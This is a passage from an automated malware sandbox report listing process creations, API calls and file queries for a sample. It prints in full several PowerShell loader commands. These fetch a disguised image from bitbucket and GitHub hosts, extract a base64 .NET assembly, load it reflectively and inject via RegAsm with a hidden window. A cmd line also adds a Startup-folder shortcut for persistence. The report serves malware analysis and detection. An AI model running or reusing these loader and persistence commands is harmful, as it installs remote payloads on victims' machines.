#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#cJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] (' txt.crijfkf/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] (' txt.mpcfsnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innocraft.url" & echo url="c:\users\user\appdata\local\designinno innovations\innocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innocraft.url" & exit
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A611CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7D2A611CC
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589395202.00000000039D4000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000000.1580560094.0000000000746000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: RegAsm.exe, 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: RegAsm.exe, 00000021.00000002.1767314740.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434CB6 cpuid 33_2_00434CB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_004019C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,33_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,33_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,33_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,33_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,33_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_00451FD0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
